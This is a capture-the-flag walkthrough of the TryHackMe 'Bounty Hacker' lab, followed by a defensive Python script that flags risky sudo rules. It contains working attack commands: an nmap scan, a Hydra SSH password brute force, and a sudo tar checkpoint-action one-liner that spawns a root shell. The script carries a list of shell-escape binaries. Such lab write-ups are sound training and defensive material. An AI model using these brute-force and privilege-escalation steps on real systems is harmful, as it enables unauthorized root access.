In this blog post, I'll share my experience tackling the "Bounty Hacker" challenge on TryHackMe, a beginner-friendly Capture The Flag (CTF) exercise designed to enhance skills in enumeration, password cracking, and privilege escalation. The primary focus of this challenge is on exploiting weak credentials and leveraging misconfigurations to gain root access.
The key vulnerabilities exploited in this challenge include:
Weak Credentials: The use of easily guessable passwords allowed unauthorized access to services.
Misconfigured Sudo Permissions: Improper configuration of sudo privileges enabled privilege escalation to the root user.
These vulnerabilities exist due to poor security practices, such as inadequate password policies and improper configuration of user privileges, which can lead to unauthorized system access in real-world scenarios.
I began by deploying the "Bounty Hacker" machine and identifying its IP address. Using Nmap, I scanned for open ports and services:
nmap -sC -sV -oN nmap_scan.txt <target_ip>
The scan revealed the following open ports:
Port 21 (FTP): vsftpd 3.0.3 (Anonymous FTP login allowed)
Port 22 (SSH): OpenSSH 7.2p2
Port 80 (HTTP): Apache httpd 2.4.18
Navigating to http://<target_ip>, I found a simple webpage mentioning names like Spike, Jet, Ed, and Faye. These could potentially be usernames, so I noted them for future reference. Inspecting the page source did not reveal any additional information.
Given that anonymous FTP login was allowed, I connected to the FTP server. Logging in as anonymous, I listed the available files:
ftp> ls
locks.txt
task.txt
I downloaded both files to my local machine:
ftp> get locks.txt
ftp> get task.txt
Examining task.txt revealed:
1. Protect Vicious.
2. Plan for Red Eye pickup on the Moon.
3. Lock down the ftp server.
4. Reformat the secondary storage drives.
5. Ask Lin for the ssh details.
This indicated that Lin might be a valid username. The locks.txt file contained a list of potential passwords, which I saved for later use.
With the username lin and a list of potential passwords, I used Hydra to brute-force SSH login:
hydra -l lin -P locks.txt ssh://<target_ip>
After some time, Hydra successfully found the password for lin.
Using the obtained credentials, I logged in over SSH, listed the contents of the home directory, and found the user.txt flag:
lin@bountyhacker:~$ cat user.txt
<user_flag>
To escalate privileges, I checked the sudo permissions for lin:
lin@bountyhacker:~$ sudo -l
Matching Defaults entries for lin on bountyhacker:
env_reset, mail_badpass,
secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
User lin may run the following commands on bountyhacker:
(root) /bin/tar
This indicated that lin could execute /bin/tar as root. Using GTFOBins, I found a method to escalate privileges using tar:
sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
Executing this command provided a root shell. I then navigated to the /root directory and retrieved the root.txt flag:
root@bountyhacker:~# cat root.txt
<root_flag>
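As an added defensive check (not part of the original writeup), the following Python parses `sudo -l` output of the shape shown above and flags rules that let a user run a binary with a documented shell escape, such as tar, with no argument restriction. The list of such binaries and the sample output are constructed assumptions for the example, not a complete GTFOBins catalogue.

```python
import re

# Constructed subset of binaries that GTFOBins documents as able to spawn a
# shell when allowed via sudo; tar is the one abused in this challenge.
SHELL_ESCAPE_BINARIES = {"tar", "vim", "less", "find", "awk", "python", "perl", "zip"}

# Constructed sample in the same shape as the `sudo -l` output on the target,
# with two extra rules added to show a constrained and a non-root case.
SAMPLE_SUDO_L = """\
Matching Defaults entries for lin on bountyhacker:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User lin may run the following commands on bountyhacker:
    (root) /bin/tar
    (root) NOPASSWD: /usr/bin/systemctl restart apache2
    (www-data) /usr/bin/less
"""

# One rule line: "(runas) [NOPASSWD:] /path/to/command [fixed args]"
RULE_RE = re.compile(r"^\s*\(([^)]+)\)\s*(NOPASSWD:\s*)?(\S+)(.*)$")


def parse_sudo_rules(text):
    """Return the command rules listed after the 'may run' header."""
    rules, in_rules = [], False
    for line in text.splitlines():
        if line.startswith("User ") and "may run" in line:
            in_rules = True          # everything before this is Defaults noise
            continue
        m = RULE_RE.match(line) if in_rules else None
        if m:
            runas, nopasswd, cmd, args = m.groups()
            rules.append({"runas": runas.strip(), "nopasswd": bool(nopasswd),
                          "command": cmd, "args": args.strip()})
    return rules


def find_risky_rules(rules):
    """Flag rules whose binary can escape to a shell and whose arguments are
    unrestricted; a rule with fixed arguments limits sudo to that exact call."""
    return [r for r in rules
            if r["command"].rsplit("/", 1)[-1] in SHELL_ESCAPE_BINARIES
            and not r["args"]]


if __name__ == "__main__":
    for r in find_risky_rules(parse_sudo_rules(SAMPLE_SUDO_L)):
        print(f"risky: ({r['runas']}) {r['command']} allows a shell escape")
```

The fix on the host is to drop the `(root) /bin/tar` rule or pin it to the exact arguments the task requires; a rule that hands root to an archiver with `--checkpoint-action` is equivalent to granting a root shell.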